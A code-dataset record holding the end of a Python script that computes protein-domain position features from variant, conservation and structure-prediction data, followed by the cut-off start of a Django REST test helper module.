hydrophobic and polar counts\n h_sum = h_cnt = hydrophobic_cnt = polar_charge_cnt = 0\n for i in range(len(AMINO_ACIDS)):\n aa_count = aa_ref_hist[i]\n if aa_count > 0:\n hindex = kd.get(AMINO_ACIDS[i], 0)\n h_sum += hindex * aa_count\n h_cnt += aa_count\n\n if hindex > 0:\n hydrophobic_cnt += aa_count\n else:\n polar_charge_cnt += aa_count\n\n h_avg = 0 if h_cnt == 0 else h_sum / float(h_cnt)\n\n return {\n 'hindex_avg': h_avg,\n 'hindex_pos_cnt': hydrophobic_cnt,\n 'hindex_neg_cnt': polar_charge_cnt\n }\n\n\ndef sub_diff_hydrophobicity(ref_alt_pairs):\n # hydrophicity difference average and weighted average\n hindex_diff_sum = hindex_diff_sum_weighted = hindex_diff_cnt = 0\n for (ref, alt, af) in ref_alt_pairs:\n hindex_diff = kd.get(alt, 0) - kd.get(ref, 0)\n hindex_diff_sum += hindex_diff\n hindex_diff_sum_weighted += hindex_diff * af\n hindex_diff_cnt += 1\n\n if hindex_diff_cnt == 0:\n hindex_diff_avg = hindex_diff_avg_weighted = 0\n else:\n hindex_diff_avg = hindex_diff_sum / float(hindex_diff_cnt)\n hindex_diff_avg_weighted = hindex_diff_sum_weighted / float(hindex_diff_cnt)\n\n return {\n 'sub_diff_hindex_avg': hindex_diff_avg,\n 'sub_diff_hindex_avg_weighted': hindex_diff_avg_weighted\n }\n\n\ndef major_allele_volume(aa_ref_hist):\n # major allele volume average, tiny, small and big counts\n vol_sum = vol_cnt = tiny_cnt = small_cnt = big_cnt = 0\n for i in range(len(AMINO_ACIDS)):\n aa_count = aa_ref_hist[i]\n if aa_count > 0:\n volume = aa_volume[AMINO_ACIDS[i]]\n vol_sum += volume * aa_count\n vol_cnt += aa_count\n\n vol_group = aa_volume_group_dict[AMINO_ACIDS[i]]\n if vol_group == aa_volume_group.TINY:\n tiny_cnt += aa_count\n elif vol_group == aa_volume_group.SMALL:\n small_cnt += aa_count\n elif vol_group == aa_volume_group.BIG:\n big_cnt += aa_count\n\n vol_avg = 0 if vol_cnt == 0 else vol_sum / float(vol_cnt)\n\n return {\n 'vol_avg': vol_avg,\n 'vol_tiny_cnt': tiny_cnt,\n 'vol_small_cnt': small_cnt,\n 'vol_big_cnt': big_cnt\n }\n\n\ndef sub_diff_volume(ref_alt_pairs):\n # ===Feature: volume difference average and weighted average===#\n volume_diff_sum = 0\n volume_diff_sum_weighted = 0\n volume_diff_cnt = 0\n for (ref, alt, af) in ref_alt_pairs:\n ref_vol = aa_volume[ref]\n alt_vol = aa_volume[alt]\n vol_diff = (ref_vol - alt_vol)\n volume_diff_sum += vol_diff\n volume_diff_sum_weighted += vol_diff * af\n volume_diff_cnt += 1\n\n if volume_diff_cnt == 0:\n volume_diff_avg = volume_diff_avg_weighted = 0\n else:\n volume_diff_avg = volume_diff_sum / float(volume_diff_cnt)\n volume_diff_avg_weighted = volume_diff_sum_weighted / float(volume_diff_cnt)\n\n return {\n 'sub_diff_vol_avg': volume_diff_avg,\n 'sub_diff_vol_avg_weighted': volume_diff_avg_weighted\n }\n\n\ndef major_allele_propensity(aa_ref_hist):\n prop_sum = [0, 0, 0]\n prop_cnt = 0\n prop_majority_counts = [0, 0, 0]\n for i in range(len(AMINO_ACIDS)):\n aa_count = aa_ref_hist[i]\n if aa_count > 0:\n curr_prop = propensity_chou_fasman[AMINO_ACIDS[i]]\n mul_curr_prop = [x * aa_count for x in curr_prop]\n prop_sum = [sum(x) for x in zip(prop_sum, mul_curr_prop)]\n prop_cnt += aa_count\n\n if curr_prop[aa_propensity.ALPHA_HELIX.value] == max(curr_prop):\n prop_majority_counts[aa_propensity.ALPHA_HELIX.value] += 1\n if curr_prop[aa_propensity.BETA_SHEET.value] == max(curr_prop):\n prop_majority_counts[aa_propensity.BETA_SHEET.value] += 1\n if curr_prop[aa_propensity.TURN.value] == max(curr_prop):\n prop_majority_counts[aa_propensity.TURN.value] += 1\n\n # ===Feature: major allele propensity avgs===#\n if prop_cnt == 0:\n prop_avg = [0, 0, 0]\n else:\n prop_avg = [x / float(prop_cnt) for x in prop_sum]\n\n # ===Feature: major allele majority propensity===#\n max_idx = np.where(np.array(prop_majority_counts) == max(prop_majority_counts))[0]\n majority_vec = [0, 0, 0]\n for i in max_idx:\n majority_vec[i] = 1 # put 1 in the propensities that has max. count\n\n return {\n 'aa_ref_alpha_prop_avg': prop_avg[0],\n 'aa_ref_beta_prop_avg': prop_avg[1],\n 'aa_ref_turn_prop_avg': prop_avg[2],\n 'aa_ref_alpha_is_majority': majority_vec[0],\n 'aa_ref_beta_is_majority': majority_vec[1],\n 'aa_ref_turn_is_majority': majority_vec[2]\n }\n\n\ndef sub_diff_propensity(ref_alt_pairs):\n # ===Feature: propensity difference average===#\n prop_vec_sum = [0, 0, 0]\n prop_vec_sum_weighted = [0, 0, 0]\n prop_cnt = 0\n for (ref, alt, af) in ref_alt_pairs:\n ref_struct = propensity_chou_fasman[ref]\n alt_struct = propensity_chou_fasman[alt]\n prop_diff = [(x - y) for (x, y) in zip(ref_struct, alt_struct)]\n prop_diff_weighted = [(x - y) * af for (x, y) in zip(ref_struct, alt_struct)]\n prop_vec_sum = [(x + y) for (x, y) in zip(prop_vec_sum, prop_diff)]\n prop_vec_sum_weighted = [(x + y) for (x, y) in zip(prop_vec_sum_weighted, prop_diff_weighted)]\n\n prop_cnt += 1\n\n if prop_cnt == 0:\n prop_vec_avg = prop_vec_avg_weighted = [0, 0, 0]\n else:\n prop_vec_avg = [(x / float(prop_cnt)) for x in prop_vec_sum]\n prop_vec_avg_weighted = [(x / float(prop_cnt)) for x in prop_vec_sum_weighted]\n\n return {\n 'sub_diff_prop_avg_alpha': prop_vec_avg[0],\n 'sub_diff_prop_avg_beta': prop_vec_avg[1],\n 'sub_diff_prop_avg_turn': prop_vec_avg[2],\n 'sub_diff_prop_avg_alpha_weighed': prop_vec_avg_weighted[0],\n 'sub_diff_prop_avg_beta_weighed': prop_vec_avg_weighted[1],\n 'sub_diff_prop_avg_turn_weighed': prop_vec_avg_weighted[2]\n }\n\n\ndef major_allele_h_bonds(aa_ref_hist):\n # avg donor and acceptor H-bond potential\n donor_sum = acceptor_sum = bonds_cnt = 0\n for i in range(len(AMINO_ACIDS)):\n aa_count = aa_ref_hist[i]\n if aa_count > 0:\n donor_sum += (aa_h_bond_donor[AMINO_ACIDS[i]] * aa_count)\n acceptor_sum += (aa_h_bond_acceptor[AMINO_ACIDS[i]] * aa_count)\n bonds_cnt += aa_count\n\n if bonds_cnt == 0:\n donor_avg = 0\n acceptor_avg = 0\n else:\n donor_avg = donor_sum / float(bonds_cnt)\n acceptor_avg = acceptor_sum / float(bonds_cnt)\n\n return {\n 'H_bond_donor_avg': donor_avg,\n 'H_bond_acceptor_avg': acceptor_avg\n }\n\n\ndef sub_diff_h_bonds(ref_alt_pairs):\n # acceptor and donor diff average and weighted average\n donor_diff_sum = donor_diff_sum_weighted = acceptor_diff_sum = acceptor_diff_sum_weighted = diff_cnt = 0\n for (ref, alt, af) in ref_alt_pairs:\n donor_diff = aa_h_bond_donor[ref] - aa_h_bond_donor[alt]\n donor_diff_sum += donor_diff\n donor_diff_sum_weighted += donor_diff * af\n\n ref_acceptor = aa_h_bond_acceptor[ref]\n alt_acceptor = aa_h_bond_acceptor[alt]\n acceptor_diff = (ref_acceptor - alt_acceptor)\n acceptor_diff_sum += acceptor_diff\n acceptor_diff_sum += acceptor_diff * af\n\n diff_cnt += 1\n\n if diff_cnt == 0:\n donor_diff_avg = donor_diff_avg_weighted = 0\n acceptor_diff_avg = acceptor_diff_avg_weighted = 0\n else:\n donor_diff_avg = donor_diff_sum / float(diff_cnt)\n donor_diff_avg_weighted = donor_diff_sum_weighted / float(diff_cnt)\n acceptor_diff_avg = acceptor_diff_sum / float(diff_cnt)\n acceptor_diff_avg_weighted = acceptor_diff_sum_weighted / float(diff_cnt)\n\n return {\n 'donor_diff_avg': donor_diff_avg,\n 'donor_diff_avg_weighted': donor_diff_avg_weighted,\n 'acceptor_diff_avg': acceptor_diff_avg,\n 'acceptor_diff_avg_weighted': acceptor_diff_avg_weighted\n }\n\n\ndef spider_solvent_acc_pred(spider_dict):\n # Accessible Surface Area (solvent accessibility) mean/std\n return {\n 'solvent_acc_avg': np.nanmean(spider_dict[\"spider2-ASA\"]),\n 'solvent_acc_std': np.nanstd(spider_dict[\"spider2-ASA\"])\n }\n\n\ndef spider_contact_number_pred(spider_dict):\n return {\n 'hsa2_cn_avg': np.nanmean(spider_dict[\"spider2-hsa2_CN\"]), # contact number for Cα-Cα mean\n 'hsa2_cn_std': np.nanstd(spider_dict[\"spider2-hsa2_CN\"]), # contact number for Cα-Cα std\n 'hsb2_cn_avg': np.nanmean(spider_dict[\"spider2-hsb2_CN\"]), # contact number for Cα-Cβ mean\n 'hsb2_cn_std': np.nanstd(spider_dict[\"spider2-hsb2_CN\"]) # contact number for Cα-Cβ std\n }\n\n\ndef spider_angles_pred(spider_dict):\n return {\n 'backbone_Phi_angle_avg': np.nanmean(spider_dict[\"spider2-angle_Phi\"]), # backbone Phi angle mean\n 'backbone_Phi_angle_std': np.nanstd(spider_dict[\"spider2-angle_Phi\"]), # backbone Phi angle std\n 'backbone_Psi_angle_avg': np.nanmean(spider_dict[\"spider2-angle_Psi\"]), # backbone Psi angle mean\n 'backbone_Psi_angle_std': np.nanstd(spider_dict[\"spider2-angle_Psi\"]), # backbone Psi angle std\n 'c-alpha_tau_angle_avg': np.nanmean(spider_dict[\"spider2-angle_tau\"]), # c-alpha angle (i-2=>i+1) mean\n 'c-alph_tau_angle_std': np.nanstd(spider_dict[\"spider2-angle_tau\"]), # c-alpha angle (i-2=>i+1) std\n 'c-alpha_theta_angle_avg': np.nanmean(spider_dict[\"spider2-angle_theta\"]), # c-alpha angle (i-1=>i+1) mean\n 'c-alph_theta_angle_std': np.nanstd(spider_dict[\"spider2-angle_theta\"]) # c-alpha angle (i-1=>i+1) std\n }\n\n\ndef spider_struct_pred(spider_dict):\n\n # major allele majority propensity\n values, counts = np.unique(np.array(spider_dict[\"spider2-2nd_struct\"]), return_counts=True)\n\n # Note: An earlier iteration of the code returned all 3 spd_*_is_majority keys as 1s\n # in the absence of any spider 2nd struct infomation, while at the same time returning all the\n # *_prob_avg/std keys as nans\n # We follow the same logic here by setting the major allele (which would normally be one of H/E/C as HEC\n # in case of missing information.\n # Note also that we cannot use np.argmax since it only returns a 'single' index\n maj_allele = 'HEC' if len(counts) == 0 else values[np.where(counts == np.max(counts))]\n\n return {\n 'helix_prob_avg': np.nanmean(spider_dict[\"spider2-helix_prob\"]), # helix prob. mean\n 'helix_prob_std': np.nanstd(spider_dict[\"spider2-helix_prob\"]), # helix prob. std\n 'sheet_prob_avg': np.nanmean(spider_dict[\"spider2-sheet_prob\"]), # sheet prob. mean\n 'sheet_prob_std': np.nanstd(spider_dict[\"spider2-sheet_prob\"]), # sheet prob. std\n 'turn_prob_avg': np.nanmean(spider_dict[\"spider2-turn_prob\"]), # turn prob. mean\n 'turn_prob_std': np.nanstd(spider_dict[\"spider2-turn_prob\"]), # turn prob. std\n 'spd_helix_is_majority': int('H' in maj_allele), # 0/1\n 'spd_sheet_is_majority': int('E' in maj_allele), # 0/1\n 'spd_turn_is_majority': int('C' in maj_allele) # 0/1\n }\n\n\ndef spider_half_sphere_exposure_pred(spider_dict):\n return {\n 'hsa2_HSE-up_avg': np.mean(spider_dict[\"spider2-hsa2_HSEu\"]),\n 'hsa2_HSE-up_std': np.std(spider_dict[\"spider2-hsa2_HSEu\"]),\n 'hsa2_HSE-down_avg': np.mean(spider_dict[\"spider2-hsa2_HSEu\"]), # TODO: should be HSEd, bug?\n 'hsa2_HSE-down_std': np.std(spider_dict[\"spider2-hsa2_HSEd\"]),\n 'hsb2_HSE-up_avg': np.mean(spider_dict[\"spider2-hsb2_HSEu\"]),\n 'hsb2_HSE-up_std': np.std(spider_dict[\"spider2-hsb2_HSEu\"]),\n 'hsb2_HSE-down_avg': np.mean(spider_dict[\"spider2-hsb2_HSEd\"]),\n 'hsb2_HSE-down_std': np.std(spider_dict[\"spider2-hsb2_HSEd\"])\n }\n\n\ndef whole_domain_conservation(states_dict):\n # phastCons and PhyloP whole-domain mean/std\n return {\n 'whole_domain_phastCons_avg': states_dict[\"_phastCons_mean\"],\n 'whole_domain_phastCons_std': states_dict[\"_phastCons_std\"],\n 'whole_domain_phyloP_avg': states_dict[\"_phyloP_mean\"],\n 'whole_domain_phyloP_std': states_dict[\"_phyloP_std\"]\n }\n\n\ndef domain_location_features(state, max_state):\n\n # ===Feature: the location in the domain: beginning/middle/end===#\n location_list = [0, 0, 0]\n BEGIN_POS = 0\n MIDDLE_POS = 1\n END_POS = 2\n domain_location_bins = np.histogram(np.arange(1, max_state), bins=3)[1]\n if state < domain_location_bins[1]:\n location_list[BEGIN_POS] = 1\n elif state > domain_location_bins[2]:\n location_list[END_POS] = 1\n else:\n location_list[MIDDLE_POS] = 1\n\n return {\n 'domain_pos': state,\n 'domain_length': max_state,\n 'domain_pos_location_begin': location_list[0],\n 'domain_pos_location_middle': location_list[1],\n 'domain_pos_location_end': location_list[2]\n }\n\n\ndef protein_location_features(protein_pos_list, protein_len_list):\n # Avg. protein total length, counts of the location in the protein: beginning/middle/end\n location_list = [0, 0, 0]\n BEGIN_POS = 0\n MIDDLE_POS = 1\n END_POS = 2\n for i in range(len(protein_pos_list)):\n prot_location_bins = np.histogram(np.arange(1, protein_len_list[i]), bins=3)[1]\n if protein_pos_list[i] < prot_location_bins[1]:\n location_list[BEGIN_POS] += 1\n elif protein_pos_list[i] > prot_location_bins[2]:\n location_list[END_POS] += 1\n else:\n location_list[MIDDLE_POS] += 1\n\n # Normalize to ratios\n location_list_norm = np.array(location_list) / sum(location_list)\n\n return {\n 'prot_avg_length': np.mean(protein_len_list),\n 'prot_pos_location_begin': location_list_norm[0],\n 'prot_pos_location_middle': location_list_norm[1],\n 'prot_pos_location_end': location_list_norm[2]\n }\n\n\nif __name__ == '__main__':\n\n with open(os.path.join(os.path.dirname(data.__file__), 'BLOSUM62_dict.pik'), 'rb') as f:\n blosum62_dict = pickle.load(f)\n\n with open(os.path.join(os.path.dirname(data.__file__), 'PAM40_dict.pik'), 'rb') as f:\n pam40_dict = pickle.load(f)\n\n with open(PROB_DICT, 'rb') as f:\n prob_dict = pickle.load(f)\n\n features_list = []\n an_str = POPULATIONS_ANS\n ac_str = POPULATIONS_ACS\n\n for pik in glob.glob(f'{HMM_STATES_FOLDER}/*.pik'):\n domain = os.path.splitext(os.path.basename(pik))[0]\n\n\n hmm_prob_dict = prob_dict[domain]\n\n with open(pik, 'rb') as handle:\n states_dict = pickle.load(handle)\n\n # Create af_adj flat dict\n states_af_adj_dict = defaultdict(list)\n for state in states_dict.keys():\n if str(state).startswith('_'): continue\n for d in states_dict[state]:\n states_af_adj_dict[state].append(d[\"af_adj\"])\n\n # scale the af_dict\n states_MAF_adj_dict_scaled = defaultdict(list)\n for state in states_dict.keys():\n if str(state).startswith('_'): continue\n state_len = len(states_dict[state])\n for d in states_dict[state]:\n states_MAF_adj_dict_scaled[state].append(float(d[\"af_adj\"] / state_len))\n\n # Create a dict of conserved states\n con_states_dict = {}\n con_threshold = 0.5\n for state in hmm_prob_dict:\n prob_list = hmm_prob_dict[state]\n for i in range(len(prob_list)):\n p = prob_list[i]\n if p > con_threshold:\n major_allele = pfam_aa_order[i]\n con_states_dict[state] = major_allele\n\n # Adding states features\n for state in states_dict:\n\n features_dict = {}\n\n if str(state).startswith('_'): continue\n state_id = domain + \"_\" + str(state)\n\n # Init counters & paramters\n maf_list = []\n sites_aa_alter_num = 0\n sites_snp_alter_num = 0\n sites_aa_num = len(states_dict[state])\n sites_snp_num = 3 * sites_aa_num\n sites_poly_aa_num = 0 # The number of different aa in all the altered sites (most are 1)\n sites_poly_aa_several = 0\n\n # Rare-poly-counters\n rare_5_num = 0\n rare_05_num = 0\n rare_005_num = 0\n\n # Conservation params\n phastCons_dict = defaultdict(list)\n phyloP_dict = defaultdict(list)\n jsd100way_list = []\n\n # SPIDER params\n spider_dict = defaultdict(list)\n\n # BLOSUM62_params\n blosum62_list = []\n weigted_blosum62_list = []\n\n # PAM40_params\n pam40_list = []\n weigted_pam40_list = []\n\n # dn/ds counters and variables\n ref_seq = \"\"\n Nd = 0\n Sd = 0\n\n # SIFT params\n sift_scores_list = []\n weighted_sift_scores_list = []\n\n # PolyPhen params\n polyphen_scores_list = []\n weighted_polyphen_scores_list = []\n polyphen_pred_list = []\n\n # clinVar params\n clinsig_list = []\n clinsig_af = []\n\n # Major allele params\n aa_ref_hist = [0] * len(AMINO_ACIDS)\n\n # Substitution params\n aa_alt_hist = [0] * len(AMINO_ACIDS)\n aa_alt_prob = [0] * len(AMINO_ACIDS)\n aa_alt_prob_avg = [0] * len(AMINO_ACIDS)\n ref_alt_pairs = []\n\n # protein position params\n protein_pos_list = []\n protein_len_list = []\n\n # Populations variables\n ac_sum = [0] * len(ac_str)\n ac_sum_syn = [0] * len(ac_str)\n ac_sum_nonsyn = [0] * len(ac_str)\n an_list = [[] for i in range(len(an_str))]\n pop_maf_list = [[] for i in range(len(an_str))]\n pop_maf_syn_list = [[] for i in range(len(an_str))]\n pop_maf_nonsyn_list = [[] for i in range(len(an_str))]\n\n # Iterating the state dict to get properties\n for d in states_dict[state]:\n\n # a list of all maf per instance\n maf_list.append(d[\"af_adj\"])\n\n # Creating a position pseudo-ref sequence\n ref_codon = d[\"bp_ref\"]\n ref_seq = ref_seq + ref_codon\n\n # Calculating frequency-based N/S\n bp_af_adj_dict = d[\"bp_af_adj_dict\"]\n for alt_codon in bp_af_adj_dict.keys():\n alt_aa = codon_table[alt_codon]\n # syn\n if alt_aa == d[\"aa_ref\"]:\n Sd += bp_af_adj_dict[alt_codon]\n # Non-syn\n else:\n Nd += bp_af_adj_dict[alt_codon]\n\n # Major allele parameters\n aa_ref = d[\"aa_ref\"]\n aa_ref_pos = AMINO_ACIDS.index(aa_ref)\n aa_ref_hist[aa_ref_pos] += 1\n\n # Conservation scores\n phastCons_curr_list = d[\"phastCons\"]\n if len(phastCons_curr_list) > 0:\n phastCons_dict[1].append(phastCons_curr_list[0])\n if len(phastCons_curr_list) > 1:\n phastCons_dict[2].append(phastCons_curr_list[1])\n else:\n phastCons_dict[2].append(np.nan)\n if len(phastCons_curr_list) > 2:\n phastCons_dict[3].append(phastCons_curr_list[2])\n else:\n phastCons_dict[3].append(np.nan)\n\n phyloP_curr_list = d[\"phyloP\"]\n if len(phyloP_curr_list) > 0:\n phyloP_dict[1].append(phyloP_curr_list[0])\n if len(phyloP_curr_list) > 1:\n phyloP_dict[2].append(phyloP_curr_list[1])\n else:\n phyloP_dict[2].append(np.nan)\n if len(phyloP_curr_list) > 2:\n phyloP_dict[3].append(phyloP_curr_list[2])\n else:\n phyloP_dict[3].append(np.nan)\n\n jsd100way_list.append(d[\"100-way-BLOSUM_JSD\"])\n\n # SPIDER parameters (add only if exist)\n if \"spider2-2nd_struct\" in d:\n spider_dict[\"spider2-2nd_struct\"].append(d[\"spider2-2nd_struct\"])\n spider_dict[\"spider2-helix_prob\"].append(float(d[\"spider2-helix_prob\"]))\n spider_dict[\"spider2-sheet_prob\"].append(float(d[\"spider2-sheet_prob\"]))\n spider_dict[\"spider2-turn_prob\"].append(float(d[\"spider2-turn_prob\"]))\n spider_dict[\"spider2-angle_Phi\"].append(float(d[\"spider2-angle_Phi\"]))\n spider_dict[\"spider2-angle_Psi\"].append(float(d[\"spider2-angle_Psi\"]))\n spider_dict[\"spider2-angle_tau\"].append(float(d[\"spider2-angle_tau\"]))\n spider_dict[\"spider2-angle_theta\"].append(float(d[\"spider2-angle_theta\"]))\n spider_dict[\"spider2-ASA\"].append(float(d[\"spider2-ASA\"]))\n spider_dict[\"spider2-hsa2_HSEu\"].append(float(d[\"spider2-hsa2_HSEu\"]))\n spider_dict[\"spider2-hsa2_HSEd\"].append(float(d[\"spider2-hsa2_HSEd\"]))\n spider_dict[\"spider2-hsb2_HSEu\"].append(float(d[\"spider2-hsb2_HSEu\"]))\n spider_dict[\"spider2-hsb2_HSEd\"].append(float(d[\"spider2-hsb2_HSEd\"]))\n spider_dict[\"spider2-hsa2_CN\"].append(float(d[\"spider2-hsa2_CN\"]))\n spider_dict[\"spider2-hsb2_CN\"].append(float(d[\"spider2-hsb2_CN\"]))\n\n protein_pos_list.append(d[\"prot_pos\"])\n protein_len_list.append(d[\"prot_len\"])\n\n if d[\"af_adj\"] > 0:\n sites_aa_alter_num += 1\n sites_snp_alter_num += len(d[\"an_adj\"])\n\n # Number of different polymorphisms at this site\n site_poly_num = len(d[\"alterations_af_adj_dict\"].keys())\n sites_poly_aa_num += site_poly_num\n if site_poly_num > 1:\n sites_poly_aa_several += 1\n\n # Rare poly features\n\n for alt_codon in bp_af_adj_dict.keys():\n # Add to counters only nonsyn SNPs\n if codon_table[alt_codon] != codon_table[ref_codon]:\n if bp_af_adj_dict[alt_codon] < MAFT_005:\n rare_005_num += 1\n rare_05_num += 1\n rare_5_num += 1\n elif bp_af_adj_dict[alt_codon] < MAFT_05:\n rare_05_num += 1\n rare_5_num += 1\n elif bp_af_adj_dict[alt_codon] < MAFT_5:\n rare_5_num += 1\n\n # Alt, BLOSUM62 and PAM40 features\n ref = d[\"aa_ref\"]\n for alt in d[\"alterations_af_adj_dict\"].keys():\n af_adj = np.mean(d[\"alterations_af_adj_dict\"][alt])\n # BLOSUM\n blosum_val = blosum62_dict[ref][alt]\n blosum62_list.append(blosum_val)\n weigted_blosum62_list.append(blosum_val * af_adj)\n # PAM\n pam_val = pam40_dict[ref][alt]\n pam40_list.append(pam_val)\n weigted_pam40_list.append(pam_val * af_adj)\n # Alt aa counts\n aa_alt_pos = AMINO_ACIDS.index(alt)\n aa_alt_hist[aa_alt_pos] += 1\n # Alt aa prob.\n aa_alt_prob[aa_alt_pos] += af_adj\n # ref-alt pairs\n ref_alt_pairs.append((ref, alt, af_adj))\n\n # SIFT\n sift_list = d[\"SIFT\"]\n for i in range(len(sift_list)):\n s = sift_list[i]\n if s != \"\":\n try:\n s_af = bp_af_adj_dict[d[\"bp_list\"][i]]\n except:\n # The major allele was replaced, no score available for the correct substitution\n continue\n sift_score = float(s[s.find(\"(\") + 1:s.find(\")\")])\n sift_scores_list.append(sift_score)\n weighted_sift_scores_list.append(sift_score * s_af)\n\n # PolyPhen\n polyphen_list = d[\"PolyPhen\"]\n for i in range(len(polyphen_list)):\n s = polyphen_list[i]\n if s != \"\":\n try:\n s_af = bp_af_adj_dict[d[\"bp_list\"][i]]\n except:\n # The major allele was replaced, no score available for the correct substitution\n continue\n polyphen_score = float(s[s.find(\"(\") + 1:s.find(\")\")])\n polyphen_scores_list.append(polyphen_score)\n weighted_polyphen_scores_list.append(polyphen_score * s_af)\n polyphen_pred_list.append(s[:s.find(\"(\")])\n\n # clinVar\n curr_clinsig_list = d[\"clin_sig\"]\n for i in range(len(curr_clinsig_list)):\n s = curr_clinsig_list[i]\n if s != \"\":\n try:\n s_af = bp_af_adj_dict[d[\"bp_list\"][i]]\n except:\n # The major allele was replaced, no score available for the correct substitution\n continue\n clinsig_list.append(s)\n clinsig_af.append(s_af)\n\n # Saving indices of syn and non-syn bps\n syn_idx = []\n nonsyn_idx = []\n for i in range(len(d[\"bp_list\"])):\n ref_aa = d[\"aa_ref\"]\n alt_bp = d[\"bp_list\"][i]\n alt_aa = codon_table[alt_bp.upper()]\n if alt_aa == ref_aa:\n syn_idx.append(i)\n else:\n nonsyn_idx.append(i)\n\n # Summing the AC per population\n for i in range(len(ac_str)):\n ac = ac_str[i]\n ac_sum[i] += sum(d[ac])\n # Summing syn and non-syn separately\n ac_sum_syn[i] += sum(np.array(d[ac])[syn_idx])\n ac_sum_nonsyn[i] += sum(np.array(d[ac])[nonsyn_idx])\n\n # Averaging the AN per population, to do that, gathering all an to a list\n for i in range(len(an_str)):\n an = an_str[i]\n (an_list[i]).extend(d[an])\n\n # Averaging the MAF per population, to do that: gathering all maf!=0 to a list\n for i in range(len(an_str)):\n ac = ac_str[i]\n an = an_str[i]\n for j in range(len(d[ac])):\n if d[an][j] != 0:\n pop_maf = d[ac][j] / float(d[an][j])\n if pop_maf != 0:\n if j in syn_idx:\n pop_maf_syn_list[i].append(pop_maf)\n else:\n pop_maf_nonsyn_list[i].append(pop_maf)\n pop_maf_list[i].append(pop_maf)\n\n features_dict['state_id'] = state_id\n features_dict['domain_name'] = domain\n\n for i in range(len(AMINO_ACIDS)):\n if aa_alt_prob[i] > 0:\n aa_alt_prob_avg[i] = aa_alt_prob[i] / float(aa_alt_hist[i])\n\n features = [\n\n ExAC_MAF_features(sites_aa_num, sites_aa_alter_num, maf_list),\n ExAC_population_features(pop_maf_list, pop_maf_syn_list, pop_maf_nonsyn_list),\n ExAC_count_features(sites_aa_num, sites_aa_alter_num, sites_snp_num, sites_snp_alter_num),\n ExAC_rareSNP_features(sites_snp_alter_num, rare_5_num, rare_05_num, rare_005_num),\n\n conservation_features(phastCons_dict, phyloP_dict),\n\n sub_matrix_features(blosum62_list, weigted_blosum62_list, 'blosum'),\n sub_matrix_features(pam40_list, weigted_pam40_list, 'pam'),\n\n pseudo_dNdS_features(ref_seq, Nd, Sd),\n pfam_emission_prob_features(hmm_prob_dict, state),\n pfam_conserved_state_feature(state, con_states_dict),\n\n SIFT_features(sift_scores_list, weighted_sift_scores_list),\n PolyPhen_features(polyphen_scores_list, polyphen_pred_list, weighted_polyphen_scores_list),\n ClinVar_scores(clinsig_list, clinsig_af),\n\n entropy_features(maf_list),\n instance_individuals_100way_change_features(maf_list, aa_ref_hist, jsd100way_list),\n\n aa_identity_features(aa_ref_hist, \"aa_ref\"),\n major_allele_charge(aa_ref_hist),\n major_allele_hydrophobicity(aa_ref_hist),\n major_allele_volume(aa_ref_hist),\n major_allele_functional_group(aa_ref_hist),\n major_allele_propensity(aa_ref_hist),\n major_allele_h_bonds(aa_ref_hist),\n\n aa_identity_features(aa_alt_hist, \"aa_alt_cnt\"),\n aa_identity_features(aa_alt_prob_avg, \"aa_alt_avg_freq\"),\n\n sub_diff_hydrophobicity(ref_alt_pairs),\n sub_diff_volume(ref_alt_pairs),\n sub_diff_functional_group(ref_alt_pairs),\n sub_diff_propensity(ref_alt_pairs),\n sub_diff_h_bonds(ref_alt_pairs),\n\n spider_solvent_acc_pred(spider_dict),\n spider_contact_number_pred(spider_dict),\n spider_angles_pred(spider_dict),\n spider_struct_pred(spider_dict),\n spider_half_sphere_exposure_pred(spider_dict),\n\n whole_domain_conservation(states_dict),\n domain_location_features(state, max([k for k in states_dict if isinstance(k, int)])),\n protein_location_features(protein_pos_list, protein_len_list)\n\n ]\n\n for feature in features:\n features_dict.update(feature)\n features_list.append(features_dict)\n\n domains_features_df = pd.DataFrame(features_list)\n domains_features_df = domains_features_df.set_index('state_id')\n domains_features_df = domains_features_df.sort_index()\n\n to_lowercase_fields = 'maf_nonsyn_AMR maf_syn_SAS maf_NFE maf_nonsyn_EAS maf_AMR maf_nonsyn_FIN maf_syn_AFR maf_syn_EAS maf_syn_OTH maf_nonsyn_SAS maf_nonsyn_AFR maf_syn_FIN maf_FIN maf_nonsyn_NFE maf_EAS maf_AFR maf_nonsyn_OTH maf_SAS maf_OTH maf_syn_AMR maf_syn_NFE'.split()\n domains_features_df = domains_features_df.rename(columns={x: x.lower() for x in to_lowercase_fields})\n domains_features_df.to_csv(OUTPUT_CSV, sep='\\t', index_label='')\n\n","repo_name":"Singh-Lab/dSPRINT","sub_path":"scripts/9.Features_exploration/positions_features.py","file_name":"positions_features.py","file_ext":"py","file_size_in_byte":53939,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"4240799273","text":"import json\nfrom copy import deepcopy\n\nfrom django.core.files.uploadedfile import InMemoryUploadedFile\nfrom django.test import TestCase\nfrom rest_framework.test import APIClient\n\nfrom base.models import User\nfrom base.test_settings import backend_url, roles\nfrom util.data_generators import createUser\n\n\ndef get_authenticated_client(role=\"admin\"):\n user = createUser(role)\n client = APIClient()\n client.force_authenticate(user=user)\n return client\n\n\ndef errorMessage(name, expected, got):\n return f\"[TEST FAILED]\\tname: {name}\\tgot: {got} (type: {type(got)})\\texpected: {expected} (type: {type(expected)})\"\n\n\nclass BaseTest(TestCase):\n data1 = None\n data2 = None\n\n def setUp(self):\n self.client = get_authenticated_client()\n\n def empty_list(self, url):\n resp = self.client.get(backend_url + \"/\" + url + \"all/\", follow=True)\n assert resp.status_code == 200, errorMessage(\"empty_list\", 200, resp.status_code)\n data = [resp.data[e] for e in resp.data]\n assert len(data) == 0, errorMessage(\"empty_list\", 0, len(data))\n\n def insert(self, url, excluded=None):\n if excluded is None:\n excluded = []\n assert self.data1 is not None, \"no data found\"\n data = self.data1\n if \"region\" in self.data1:\n data = json.dumps(self.data1)\n resp = self.client.post(backend_url + \"/\" + url, data, content_type=\"application/json\", follow=True)\n else:\n resp = self.client.post(backend_url + \"/\" + url, data, follow=True)\n assert resp.status_code == 201, errorMessage(\"insert\", 201, resp.status_code)\n for key in self.data1:\n if key in excluded:\n continue\n assert key in resp.data, errorMessage(\"insert\", key, None)\n if type(self.data1[key]) == InMemoryUploadedFile:\n continue\n assert self.data1[key] == resp.data[key], errorMessage(\n f\"insert (key:{key})\", self.data1[key], resp.data[key]\n )\n assert \"id\" in resp.data, errorMessage(\"insert\", \"id\", None)\n\n def insert_empty(self, url):\n resp = self.client.post(backend_url + \"/\" + url, {}, follow=True)\n print(resp)\n assert resp.status_code == 400, errorMessage(\"insert_empty\", 400, resp.status_code)\n\n def 